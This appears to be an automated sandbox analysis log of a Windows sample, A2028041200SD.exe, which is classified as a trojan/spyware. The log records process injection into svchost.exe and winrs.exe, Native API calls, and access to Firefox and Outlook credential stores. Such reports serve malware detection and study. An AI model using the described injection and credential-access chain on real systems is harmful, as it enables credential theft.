                Source: Yara match | File source: 0000000A.00000002.3124723950.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391788061.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3124795821.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1391861547.0000000005400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000008.00000002.1390489944.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000A.00000002.3121706684.0000000000640000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3132931690.0000000008020000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000009.00000002.3124924415.0000000004A00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: This is a third-party compiled AutoIt script. 0_2_008F3D19
                Source: A2028041200SD.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
                Source: A2028041200SD.exe, 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_d8cd57ce-3
                Source: A2028041200SD.exe, 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_46f83975-4
                Source: A2028041200SD.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_1e6c5502-5
                Source: A2028041200SD.exe | String found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_fd9deeb1-0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_024DC403 NtClose,8_2_024DC403
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72B60 NtClose,LdrInitializeThunk,8_2_02F72B60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_02F72DF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F735C0 NtCreateMutant,LdrInitializeThunk,8_2_02F735C0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F74340 NtSetContextThread,8_2_02F74340
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F74650 NtSuspendThread,8_2_02F74650
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72AF0 NtWriteFile,8_2_02F72AF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72AD0 NtReadFile,8_2_02F72AD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72AB0 NtWaitForSingleObject,8_2_02F72AB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72BF0 NtAllocateVirtualMemory,8_2_02F72BF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72BE0 NtQueryValueKey,8_2_02F72BE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72BA0 NtEnumerateValueKey,8_2_02F72BA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72B80 NtQueryInformationFile,8_2_02F72B80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72EE0 NtQueueApcThread,8_2_02F72EE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72EA0 NtAdjustPrivilegesToken,8_2_02F72EA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72E80 NtReadVirtualMemory,8_2_02F72E80
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72E30 NtWriteVirtualMemory,8_2_02F72E30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72FE0 NtCreateFile,8_2_02F72FE0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72FB0 NtResumeThread,8_2_02F72FB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72FA0 NtQuerySection,8_2_02F72FA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72F90 NtProtectVirtualMemory,8_2_02F72F90
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72F60 NtCreateProcessEx,8_2_02F72F60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72F30 NtCreateSection,8_2_02F72F30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72CF0 NtOpenProcess,8_2_02F72CF0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72CC0 NtQueryVirtualMemory,8_2_02F72CC0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72CA0 NtQueryInformationToken,8_2_02F72CA0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72C70 NtFreeVirtualMemory,8_2_02F72C70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72C60 NtCreateKey,8_2_02F72C60
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72C00 NtQueryInformationProcess,8_2_02F72C00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72DD0 NtDelayExecution,8_2_02F72DD0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72DB0 NtEnumerateKey,8_2_02F72DB0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72D30 NtUnmapViewOfSection,8_2_02F72D30
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72D10 NtMapViewOfSection,8_2_02F72D10
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F72D00 NtSetInformationFile,8_2_02F72D00
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F73090 NtSetValueKey,8_2_02F73090
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F73010 NtOpenDirectoryObject,8_2_02F73010
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F739B0 NtGetContextThread,8_2_02F739B0
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F73D70 NtOpenThread,8_2_02F73D70
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 8_2_02F73D10 NtOpenProcessToken,8_2_02F73D10
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00936685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00936685
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092AF64 GetCurrentProcess,OpenProcessToken,CreateEnvironmentBlock,CloseHandle,CreateProcessWithLogonW,DestroyEnvironmentBlock,0_2_0092AF64
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_009379D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009379D3
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F87E54 appears 100 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02FBF290 appears 105 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02F2B970 appears 283 times
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: String function: 00916AC0 appears 42 times
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: String function: 0091F8A0 appears 35 times
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: String function: 0090EC2F appears 68 times
                Source: A2028041200SD.exe, 00000000.00000003.1284104843.0000000003673000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe
                Source: A2028041200SD.exe, 00000000.00000003.1286483854.000000000386D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs A2028041200SD.exe
                Source: A2028041200SD.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@14/11
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093CE7A GetLastError,FormatMessageW,0_2_0093CE7A
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092AB84 AdjustTokenPrivileges,CloseHandle,0_2_0092AB84
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0092B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0092B134
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0093E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0093E1FD
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_00936532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00936532
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_0094C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0094C18C
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Code function: 0_2_008F406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_008F406B
                Source: C:\Users\user\Desktop\A2028041200SD.exe | File created: C:\Users\user\AppData\Local\Temp\aut5BF2.tmp
                Source: A2028041200SD.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: winrs.exe, 0000000A.00000003.1579586366.0000000000887000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008D6000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1579586366.00000000008A8000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3122304267.00000000008B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: A2028041200SD.exe | ReversingLabs: Detection: 31%
                Source: unknown | Process created: C:\Users\user\Desktop\A2028041200SD.exe "C:\Users\user\Desktop\A2028041200SD.exe"
                Source: C:\Users\user\Desktop\A2028041200SD.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exe | Process created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"
                Source: C:\Windows\SysWOW64\winrs.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\A2028041200SD.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\A2028041200SD.exe"Jump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeProcess created: C:\Windows\SysWOW64\winrs.exe "C:\Windows\SysWOW64\winrs.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\A2028041200SD.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\winrs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: A2028041200SD.exeStatic file information: File size 1214464 > 1048576
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: A2028041200SD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: zJGHFZpQDL.exe, 00000009.00000002.3122329722.0000000000A8E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: A2028041200SD.exe, 00000000.00000003.1283531173.0000000003550000.00000004.00001000.00020000.00000000.sdmp, A2028041200SD.exe, 00000000.00000003.1285810002.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1391439293.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1391439293.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1288833673.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1290791645.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1394010925.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000003.1391554853.0000000002A72000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 0000000A.00000002.3125013421.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000008.00000003.1356648780.0000000002824000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356563813.000000000281B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1356633765.000000000281A000.00000004.00000020.00020000.00000000.sdmp, zJGHFZpQDL.exe, 00000009.00000003.1465092401.0000000000EBF000.00000004.00000001.00020000.00000000.sdmp
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: A2028041200SD.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0090E01E LoadLibraryA,GetProcAddress,0_2_0090E01E
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00916B05 push ecx; ret 0_2_00916B18
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091BDAA push edi; ret 0_2_0091BDAC
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_0091BEC3 push esi; ret 0_2_0091BEC5
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_01277F23 push esp; iretd 0_2_01277F24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B4A23 push esi; retf 8_2_024B4A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B3220 push eax; ret 8_2_024B3222
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B4A20 push esi; retf 8_2_024B4A2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BD376 push ds; ret 8_2_024BD388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C5BF3 push esi; retf 8_2_024C5BFE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024BA9DB push edx; retf 8_2_024BA9DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B51D0 push es; iretd 8_2_024B51D2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C4675 push ebp; retf 8_2_024C4688
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B161B push E588A11Fh; iretd 8_2_024B1623
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024C7F6B push ebx; iretd 8_2_024C7F71
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B87CB push es; ret 8_2_024B87CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024D3413 pushfd ; ret 8_2_024D3437
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_024B6415 push edx; retf 8_2_024B641C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_02F309AD push ecx; mov dword ptr [esp], ecx8_2_02F309B6
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA5C50 push es; ret 9_2_04AA5C52
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB7DF7 push edx; retf 9_2_04AB7DF8
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA1EA8 push esi; retf 9_2_04AA1EB3
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA1EA5 push esi; retf 9_2_04AA1EB3
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA7E60 push edx; retf 9_2_04AA7E61
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA2655 push es; iretd 9_2_04AA2657
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AAA7FB push ds; ret 9_2_04AAA80D
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AA389A push edx; retf 9_2_04AA38A1
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AC0898 pushfd ; ret 9_2_04AC08BC
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3078 push esi; retf 9_2_04AB3083
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB3076 push esi; retf 9_2_04AB3083
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB1AFA push ebp; retf 9_2_04AB1B0D
                Source: C:\Program Files (x86)\sldRxWQECDhSfMeMiXnjUkxYhWJfedEYWNhutcWNsBrhHcHEOsaCNhiHMaHBiSPnnLbdpmTDmXShT\zJGHFZpQDL.exeCode function: 9_2_04AB53F0 push ebx; iretd 9_2_04AB53F6
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00958111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00958111
